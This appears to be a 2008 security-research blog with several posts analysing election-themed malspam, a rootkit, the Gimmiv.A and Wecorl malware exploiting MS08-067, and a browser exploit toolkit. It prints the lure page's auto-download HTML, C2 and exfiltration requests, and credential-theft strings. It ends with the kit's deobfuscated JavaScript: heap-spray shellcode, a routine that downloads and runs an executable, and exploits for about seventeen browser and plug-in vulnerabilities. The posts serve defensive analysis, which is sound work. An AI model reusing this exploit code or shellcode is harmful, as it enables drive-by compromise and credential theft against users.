Barack Obama Elected 44th President of United States Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5! ...... "

On 7 November 2008, it was McCain’s turn to be center stage on the malspam front. The following is a sample email with a hyperlink to fake news website.

From: USA news []
Sent: Friday, November 07, 2008 10:53 AM
Subject: McCain want to stop Obama

McCain Lawyer Impeach Obama!
McCain has reached an agreement with the Obama lawyers that makes Obama resignation effective November 11.
Barack Obama can lost President's Chair.
McCain video report 7 November:

Proceed to the election results news page>> <> 2008 USA Government Official Web Site.

Sample malspam email subjects include:

McCain Lawyers Want to Stop Obama
Barack Obama in Danger - McCain will fight for president post
McCain Lawmakers Impeach Obama
McCain said today: 'Impeach Obama'
Obama Impeachment Resources: McCain Look at the Impeachment Process ...
Obama faces impeachment
The Impeachment of new president Obama
IMPEACH Barrack Obama | USA government news
Scandal: Obama Resignation Letter
Video: Obama post-resignation speech
Barack Obama can lost President's Chair. The President's Resignation.
Barack Obama can lost presidents chair.The President's Resignation Speech - TIME
Barack Obama president resignation - 23/7 News
Barack Obama can lost President's Chair. Political Strike at WV Mine
Barack Obama can lost President's Chair. Political Strike Confronts the Global Economy
Barack Obama can lost President's Chair.POLITICAL STRIKE TIES
McCain strike against Obama political way
Obama vs McCain 'Political Strike' May Undermine Labor Group
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Why MccAin Want to Stop Obama From president vacancy?
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
WScandal: Re-elections hich John McCain will show up to debate?
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections Why McCain Will Win
Scandal: Re-elections John McCain will defeat Barack Obama

Sample malspam email From field values include:

USA Government Center
USA news
CNN news
McCain News Center
Elections Centre
Election News

Sample malspam email From spoofed addresses include:

The malspam hyperlinks point to fast-fluxed hosted domains.

The domains mapped to the following fast-flux IP addresses at the time of analysis.

IP Reverse Country JP US US IL TW

The hyperlinks point to a website that advertises a McCain video and hyperlinks to get the Adobe Flash Media Player.

The site includes several methods of fooling victim’s into downloading AdobePlayer9.exe.

<meta http-equiv="REFRESH" content="10;url=../AdobePlayer9.exe">

<a href="AdobePlayer9.exe"><img border="0" src="160x41_Get_media_Player.jpg" width="160" height="41"></a>

<a href="AdobePlayer9.exe">
<img border="0" src="McCainvideo.jpg" width="582" height="402" onclick="alert1()" onMouseOver="window.status='';
return true" onMouseOut="window.status=''; return true" TARGET="_top"></a>

Malware Analysis

25,173 bytes

AdobePlayer9.exe creates C:\WINDOWS\9129837.exe

25,173 bytes

9129837.exe creates C:\WINDOWS\new_drv.sys

8,192 bytes

The following registry keys store malware identification data.

HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Data: 50, FF, F4, 94
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Data: B8, 72, F7, 4E
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 2

The following registry keys install new_drv.sys as a service.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"

The following hidden registry key launches 9129837.exe at startup

ttool = C:\WINDOWS\9129837.exe

Both 9129837.exe and new_drv.sys install as a rootkit. Files, registry keys, and processes are hidden.

>SSDT State
Actual Address 0x81C1F58A
Hooked by: Unknown module filename

Actual Address 0x81C1F6B6
Hooked by: Unknown module filename

Actual Address 0x81C1F85C
Hooked by: Unknown module filename

!!!!!!!!!!!Hidden process: C:\WINDOWS\9129837.exe
Process Id: 596
EPROCESS Address: 0x81C9D9F8

Suspect File: C:\WINDOWS\9129837.exe Status: Hidden
Suspect File: C:\WINDOWS\new_drv.sys Status: Hidden

The malware hooks into any running process. The following example shows a hook into svchost.exe.

[1056]svchost.exe-->kernel32.dll-->CreateProcessA, Type: Inline - RelativeJump at address 0x77E61BBC hook handler located in [unknown_code_page]
[1056]svchost.exe-->kernel32.dll-->CreateProcessW, Type: Inline - RelativeJump at address 0x77E61B8E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump at address 0x7622B059 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExW, Type: Inline - RelativeJump at address 0x76240C8A hook handler located in [unknown_code_page]

9129837.exe listens on TCP port 13899 and runs a s a hidden process.

Process C:\WINDOWS\9129837.exe (*** hidden ***)

Protocol Local Address Foreign Address State PID PathName
TCP : 13899 : 0 LISTENING 596 C:\WINDOWS\9129837.exe
UDP : 1037 * : * 596 C:\WINDOWS\9129837.exe
RAW --- --- --- 596 C:\WINDOWS\9129837.exe

9129837.exe connects to (UA) to register itself, receive instructions and exfiltrate data. The malware performs the following connections:

POST /cgi-bin/pstore.cgi
GET /cgi-bin/cmd.cgi
GET /cgi-bin/options.cgi
POST /cgi-bin/cert.cgi

POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dbe3fdbe3fdbe3f
User-Agent: IE
Content-Length: 224
Cache-Control: no-cache

Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream

GET /cgi-bin/cmd.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1

GET /cgi-bin/options.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1

POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dcd05dcd05dcd05
User-Agent: IE
Content-Length: 298
Cache-Control: no-cache

Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream

0S...0...*.H.. .......0.0;0.0...+............2........&..........N...+..\.......{....

MS08-067 and W32.Wecorl

On 2 November 2008, Symantec reported a “worm” called W32.Wercol that attempted to exploit the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067). The following provides analysis for the W32.Wercol malware variant 10wrjcenew.exe.

In a lab test, the malware 10wrjcenew.exe:

Created C:\DOCUME~1\%user profile%\LOCALS~1\Temp\Install.2008.dat
Deleted C:\WINDOWS\System32\Dllcache\Svchost.exe
Modified C:\WINDOWS\System32\Svchost.exe
Created C:\WINDOWS\system32\7DBF6DA4

The following registry keys were created:

Data: (data too large: 3584 bytes)

The malware proceeded to download mimi.1268772 from (, CN) and pp.gif from (, US)

GET /mimi.1268772 HTTP/1.1

GET /u/f/o/ufo2000sgd/pp.gif HTTP/1.1

The malware attempted a MS08-067 buffer overflow exploit against 121.x.x.x UDP port 137

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..

The malware connects to (, CN) ClientReg.aspx and ClientTask.aspx to register the malware and receive C2 instructions. The sample connection shows a download request for

GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1

HTTP/1.1 200 OK

xxyysign xxyyMyIP=xx.xx.xx.xx

GET /ClientTask.aspx?mac= xx:xx:xx:xx:xx:xx &Type=0&Sn=081026 HTTP/1.1

HTTP/1.1 200 OK


The following files were observed during analysis:

10752 f01fd7ecfce8af65832a3a57d2789fa6 10wrjcenew.exe
12800 0f7d9c87b0ce1fa520473119752c6f79 3EDFB6D2
900 14c9db2b8177ca199f283e644fcda225 mimi.1268772
404992 0fdb364e8666140d4570d24f363d26d5 nb1103.exe
258048 944b1a83ee17db7fa779a2e7d970768c pp.gif

Thursday, November 6, 2008

MS08-067 and Trojan.Gimmiv.A

On 24 October 2008, Microsoft released an out-of-cycle patch that addressed a stack buffer overflow vulnerability in the Microsoft Windows Server service MS08-067, CVE-2008-4250. Per Microsoft, "This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit."

Public exploit code and malware began circulating as soon as the patch was released. Microsoft and Symantec provided analysis on malware known as Gimmiv.A. The malware harvests and exfiltrates system information and is able to scan and exploit the MS08-067 vulnerability. The following provides analysis findings for Gimmiv.A.

Site (JP) was found to host nine Gimmiv.A binaries, n*1-9.


dc3fdfde66fffb6cfbec946a237787d8 397312
f173007fbd8e2190af3be7837acd70a4 397312
3ee354cc8b63b8849b28e6f376f2b263 397312
6c3e53864541bb13fa7853f7b580b807 397312
24cd978da62cff8370b83c26e134ff4c 397312
86d75ae361637a8f9114bb3a40f710d3 397312
ee70f981514803e1fb4e6b65f492a56d 397312
8d66f28d028a4838d09ce4b91d35b7cb 397312
477aac8d472a7bea8b906718a2f50c67 397312

The malware n2.exe was analyzed as an example.

n2.exe creates c:\WINDOWS\system32\wbem\sysmgr.dll

336384 bytes

The following registry keys are created to install the malware as a service.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
"sysmgr" = sysmgr
"DisplayName" = System Maintenance Service
"ErrorControl" = 0
"ImagePath" = %SystemRoot%\System32\svchost.exe -k sysmgr
"ObjectName" = LocalSystem
"Start" = 2
"Type" = 10, 01, 00, 00


"0" = Root\LEGACY_SYSMGR\0000
"Count" = 1
"NextInstance" = 1
"ServiceDll" = C:\WINDOWS\System32\wbem\sysmgr.dll
"ServiceMain" = ServiceMainFunc
"Security" = binary data

The malware searches the registry for the presence of installed antivirus programs and active processes for avp.exe and dwm.exe.

0002549C 1002549C 0 SOFTWARE\BitDefender
000254B4 100254B4 0 avp.exe
000254BC 100254BC 0 SOFTWARE\Jiangmin
000254D8 100254D8 0 SOFTWARE\KasperskyLab
000254F0 100254F0 0 SOFTWARE\Kingsoft
00025504 10025504 0 SOFTWARE\Symantec\PatchInst\NIS
00025524 10025524 0 SOFTWARE\Microsoft\OneCare Protection
0002554C 1002554C 0 SOFTWARE\rising
0002555C 1002555C 0 SOFTWARE\TrendMicro
00025574 10025574 0 dwm.exe

The malware sysmgr.dll sends ICMP Echo requests to and An Echo reply was returned from

Source Destination Protocol Info ICMP Echo (ping) request ICMP Echo (ping) request ICMP Echo (ping) reply

The ICMP packet contains a string of characters abcde12345fghij6789.

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 30 00 81 00 00 80 01 98 fe c0 a8 00 0d ca 6c .0.............l
0020 16 2c 08 00 ba 5f 02 00 02 00 61 62 63 64 65 31 .,..._....abcde1
0030 32 33 34 35 66 67 68 69 6a 36 37 38 39 00 23 45 fghij6789.

The binary strings of sysmgr.dll reveal the ICMP string and a third IP

00039018 00439018 0 abcde12345fghij6789
00039030 00439030 0
00039070 00439070 0
00039090 00439090 0 (CN)
Reverse lookup (US)
Reverse lookup (DE)
Reverse lookup

The malware captures host information such as IP address and hostname and credentials from Outlook Express and Protected Storage.

00025E04 10025E04 0 Username
00025E10 10025E10 0 82BD0E67-9FEA-4748-8672-D5EFE5B779B0
00025E38 10025E38 0 Advapi32.dll
00025E48 10025E48 0 CredEnumerate
00025E58 10025E58 0 CredFree
00025E64 10025E64 0 Passport.Net\*
00025E74 10025E74 0 pstorec.dll
00025E80 10025E80 0 PStoreCreateInstance
00025E9C 10025E9C 0 89c39569
00025EA8 10025EA8 0 5e7e8100
00025EB4 10025EB4 0 e161255a
00025EC8 10025EC8 0 StringIndex
00025ED4 10025ED4 0 :String
00025EDC 10025EDC 0 :String
00025EE4 10025EE4 0 http:/
00025EEC 10025EEC 0 https:/
00025EF8 10025EF8 0 ===============Outlook Express===============
00025F28 10025F28 0 ===============Credential Info================
00025F58 10025F58 0 ============Protected Storage Info=============
00025F94 10025F94 0 Pass:
00025F9C 10025F9C 0 URL:
00025FA8 10025FA8 0 GetWebInfo
00025FB4 10025FB4 0 <%s %d> !!! Web ID/Pass Info ERR
00025FE7 10025FE7 0 ksysmgr

The malware exfiltrates the captured information to[num]?def=[num]. The abc value represents the installed antivirus version and the def value represents the OS version. The exfiltrated data protected with encrypted with AES encryption.

00025638 10025638 0 ?abc=1
00025648 10025648 0 ?abc=3
00025658 10025658 0 ?abc=4
00025668 10025668 0 ?abc=5
00025678 10025678 0 ?abc=6
00025688 10025688 0 ?abc=7
00025698 10025698 0 ?abc=8
000256A8 100256A8 0 ?abc=9
000256B8 100256B8 0 ?abc=2
000256C8 100256C8 0 ?def=2
000256D8 100256D8 0 ?def=3
000256E8 100256E8 0 ?def=1
000256F8 100256F8 0 ?def=4
00025708 10025708 0 ?def=5

Gimmiv.A attempts to connect to the remote IP address to download a CAB file to %System%\ From the CAB file, the trojan extracts the following files:


311296 82ba009746da8603c463f37e381a42a4 basesvc.dll
200704 60d692fd52098f145e448bd985fcff6d syicon.dll
49152 40cb861ad59c804f340fd8a2a28e226c winbase.dll

The additional dlls provide the functionality of scanning and exploiting the MS08-067 vulnerability.

Tuesday, September 30, 2008

Exploit Toolkit Expansion

Automated exploit toolkits such as MPack, Neosploit, and various knockoffs continue to add exploits targeted against a wide variety of Microsoft Internet Explorer, Microsoft Office, Firefox, 3rd party plug-in and application (Flash, Adobe Acrobat Reader, WinZip, media players, etc.) vulnerabilities. The following exploit toolkit sample targeted 17 vulnerabilities.

Exploit Code Analysis:

A compromised website contained an iframe that redirected to http[:]// The site contained an iframe that redirected to http[:]// The index.php page returned obfuscated JavaScript that decoded to reveal exploits targeted against the following vulnerabilities.

MDAC RDS.Dataspace ActiveX Control Vulnerability - CVE-2006-0003 - MS06-014

Microsoft Windows WebViewFolderIcon ActiveX integer overflow - CVE-2006-3730 - MS06-057

Microsoft Access Snapshot Viewer ActiveX Control Vulnerability - CVE-2008-2463 - MS08-041

Heap-based buffer overflow in DirectAnimation.PathControl COM object - CVE-2006-4446 - MS06-067

COM Object Instantiation Memory Corruption Vulnerability - CVE-2005-2127 - MS05-052

Microsoft Works ActiveX Control Remote Code Execution - CVE-2007-5348 - MS08-052

Ourgame GLWorld GLIEDown2.dll ActiveX Control Vulnerability

CA Products DSM ListCtrl ActiveX Control Code Execution Vulnerability - CVE-2008-1472

Adobe Reader and Acrobat Multiple Stack-based Buffer Overflow Vulnerabilities - CVE-2007-5659

America Online SuperBuddy ActiveX Control Code Execution Vulnerability - CVE-2006-5820

GOM Player GOM Manager ActiveX Control Buffer Overflow - CVE-2007-5779

Microsoft XML Core Services XMLHTTP ActiveX Control Vulnerability - CVE-2006-5745 - MS06-071

Apple QuickTime RTSP Content-Type header stack buffer overflow - CVE-2007-6166

RealNetworks RealPlayer ActiveX controls property heap memory corruption - CVE-2008-1309

Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018

Creative Software AutoUpdate Engine ActiveX stack buffer overflow - CVE-2008-0955

Sina DLoader Class ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download Vulnerability

Index.php Exploit Code:

var url="http[:]//";
var m=new Array();
var mf=0;
function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
var width=(width?width:0);
return hex;
function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
return unescape(tmp);
function hav(){
function gss(ss,sss){
return ss;
function ms(){
var plc=unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u352F%u2E39%u3231%u2E35%u3232%u2E39%u3137%u652F%u2F78%u2F37%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3334%u3636%u7326%u6C70%u353D");
if (mf)return(0);
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
function cobj(obj){
var ret=null;
var clsid=obj.substring(1,obj.length-1);
return ret;
return null;
ret=new ActiveXObject(obj);
return ret;
return null;
var padding = "AAAA";
var heapBase = 0x00150000;
var memo;
function init(maxAlloc){
while (4 + padding.length*2 + 2 < 65535)padding += padding;
memo = new Array();
function flush(){
delete memo["plunger"];
memo["plunger"] = new Array();
var bytes = new Array(32, 64, 256, 32768);
for (var i = 0; i < 6; i++) {
for(var n = 0; n < 4; n++) {
var len = memo["plunger"].length;
eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
function alloc(arg, tag){
var size;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag] )memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = padding.substr(0, (arg-6)/2);
function alloc_str(arg, tag){
var size;
size = 4 + arg.length*2 + 2;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag])memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = arg.substr(0, arg.length);
function free(tag) {
delete memo[tag];
function CreateO(o,n){
var r=null;
function Go(a){
var eurl=url+"&spl=1";
var fname="winbQB0sCA.exe";
var fso=CreateO(a,"Scripting.FileSystemObject")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
catch(e){try{nl=new XMLHttpRequest();"GET",eurl,false);}
catch(e){return 0;}}}}
return 1;
function mdac() {
var i=0;
var target=new Array(
var a=null;
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
return 0;
function wfi() {
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
return 0;
function com() {
return 0;
function dani() {
var jmpecx = 0x0c0c0c0c;
var vtable = addr(0x7ceb9090);
for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);
vtable += padding.substr(0, (1008-138)/2);
var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;
var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);
for (var i = 0; i < 100; i++)alloc_str(vtable);
alloc_str(vtable, "lookaside");
for (var i = 0; i < 100; i++)alloc(0x2010);
for (var i = 0; i < 2; i++) {
alloc_str(fakeObjChunk, "freeList");
obj.KeyFrame(0x40000801, new Array(1), new Array(1));
return 0;
function office(){
var dir=new Array(
"C:\Documents and Settings\All Users\Start Menu\Programs\StartUp\office.exe",
"C:\Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\office.exe",
"C:\Documents and Settings\All Users\Menu Inicio\Programas\Inicio\office.exe",
"C:\Documents and Settings\All Users\Kuynnistu-valikko\Ohjelmat\Kuynnistys\office.exe",
"C:\Documents and Settings\All Users\Menu Dumarrer\Programmes\Dumarrage\office.exe",
"C:\Documents and Settings\All Users\Menuen Start\Programmer\Start\office.exe",
"C:\Documents and Settings\All Users\Menu Start\Programma's\Opstarten\office.exe",
"C:\Documents and Settings\All Users\Start Menu\Programlar\BASLANGI\office.exe",
"C:\Documents and Settings\All Users\Menu Start\Programy\Autostart\office.exe",
"C:\Documents and Settings\All Users\Start-meny\Programmer\Oppstart\office.exe",
"C:\Documents and Settings\All Users\Start-menyn\Program\Autostart\office.exe",
"C:\Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\office.exe",
"C:\Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\office.exe");
var obj=null;
obj=cobj("snpvw.Snapshot Viewer Control.1");
if (obj){
obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = url+"&opr=1";
obj.CompressedPath = dir[j];
return 0;
function dl(){
var obj=null;
if (obj){
return 0;
function wks(){
var obj=null;
var num = 202116108;
obj.WksPictureInterface = num;
return 0;
function ogame(){
var obj=null;
var buf = "";
while (buf.length < 600) buf += "\x0c\x0c\x0c\x0c";
return 0;
function ca(){
var obj=null;
if (obj.AddColumn) {
var buf = addr(0x0c0c0c0c);
while(buf.length < 128)buf += buf;
buf = buf.substring(0, 128);
return 0;
function buddy(){
try {
var obj=null;
obj = cobj("Sb.SuperBuddy");
if (obj) {
} catch(e){}
return 0;
function gomweb(){
try {
var obj=null;
obj = cobj("GomWebCtrl.GomManager.1");
if (obj) {
var buf="AAAA";
while (buf.length < 506) buf += buf;
buf = buf.substring(0,506);
buf += addr(0x0c0c0c0c);
} catch(e){}
return 0;
function xmlcore(){
try {
var xml = null;
var xml = cobj("Msxml2.XMLHTTP.6.0");
if (xml){
xml = cobj("Msxml2.XMLHTTP.4.0");
if(!xml)return 0;
var obj=null;
obj = cobj("{88d969c5-f192-11d4-a65f-0040963251e5}");
obj = obj.object
if(obj) {
try { Array(),new Array(),new Array(),new Array(),new Array());} catch(e) {}; Object(),new Object(),new Object(),new Object(),new Object());
obj.setRequestHeader(new Object(),"...");
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
obj.setRequestHeader(new Object(),0x1016660);
} catch(e){}
return 0;
function quick(){
try {
var obj=null;
obj = cobj("QuickTime.QuickTime.4");
if (obj) {
var buf = "";
for(var i=0;i<200;i++) {
buf += "AAAA";
buf += "AAA";
for(var i=0;i<3;i++)buf += "\x0c\x0c\x0c\x0c";
var my_div = document.createElement("div");
my_div.innerHTML =
"<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" width=\"200\" height=\"200\">" +
"<param name=\"src\" value=\"object_rtsp\">" +
"<param name=\"type\" value=\"image/x-quicktime\">" +
"<param name=\"autoplay\" value=\"true\">" +
"<param name=\"qtnext1\" value=\"<rtsp://BBBB:"+buf+">T<myself>\">" +
"<param name=\"target\" value=\"myself\">" +

} catch(e) {}
return 0;
function real(){
try {
var obj=null;
obj = cobj("IERPCtl.IERPCtl.1");
if (obj) {
if(obj.PlayerProperty("PRODUCTVERSION")>"") {
obj = cobj("{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}");
var m = "";
var buf = addr(0x0c0c0c0c);
while (buf.length < 32) buf += buf;
buf = buf.substring(0,32);
m = obj.Console;
obj.Console = buf;
obj.Console = m;
m = obj.Console;
obj.Console = buf;
obj.Console = m;
} catch(e){}
return 0;
function ntaudio(){
var obj=null;
var buf = addr(0x0c0c0c0c);
while (buf.length < 5200) buf += buf;
buf = buf.substring(0,5200);
return 0;
function creative(){
var obj=null;
var buf = addr(0x09090909);
while (buf.length < 512) buf += buf;
buf = buf.substring(0,512);
obj.cachefolder = buf;
return 0;

function pdf(){
try {
var vers = new Array(0,0,0);
var ver = "0";
var obj = null;
obj = cobj("AcroPDF.PDF");
if (!obj){
obj = cobj("PDF.PdfCtrl");

if (obj) {
var my_div = document.createElement("div");
my_div.innerHTML = "<iframe src=\"http[:]//\" width=100 height=100 style=\"display:none\"></iframe>";
} catch(e){}
return 0;

if (
mdac() ||
office() ||
dl() ||
pdf() ||
wfi() ||
com() ||
creative() ||
wks() ||
ogame() ||
ca() ||
buddy() ||
gomweb() ||
xmlcore() ||
quick() ||
real() ||
|| dani()
) {}